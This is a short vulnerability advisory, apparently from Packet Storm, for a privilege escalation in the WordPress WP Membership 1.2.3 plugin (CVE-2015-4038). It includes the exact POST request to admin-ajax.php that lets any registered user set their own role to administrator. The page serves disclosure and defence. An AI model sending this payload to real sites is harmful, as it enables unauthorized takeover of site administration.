Lucene search

K
packetstormPanVagenasPACKETSTORM:132012
HistoryMay 22, 2015 - 12:00 a.m.

WordPress WP Membership 1.2.3 Privilege Escalation

2015-05-2200:00:00
panVagenas
packetstormsecurity.com
14

0.008 Low

EPSS

Percentile

80.2%

`# Exploit Title: WordPress WP Membership plugin [Privilege escalation]  
# Contact: https://twitter.com/panVagenas  
# Vendor Homepage: http://wpmembership.e-plugins.com/  
# Software Link: http://codecanyon.net/item/wp-membership/10066554  
# Version: 1.2.3  
# Tested on: WordPress 4.2.2  
# CVE: CVE-2015-4038  
  
1 Description  
  
Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action.   
Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website.  
  
2 Proof of Concept  
  
* Login as regular user  
* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`  
  
3 Actions taken after discovery  
  
Vendor was informed on 2015/05/19.  
  
4 Solution  
  
No official solution yet exists.  
`

0.008 Low

EPSS

Percentile

80.2%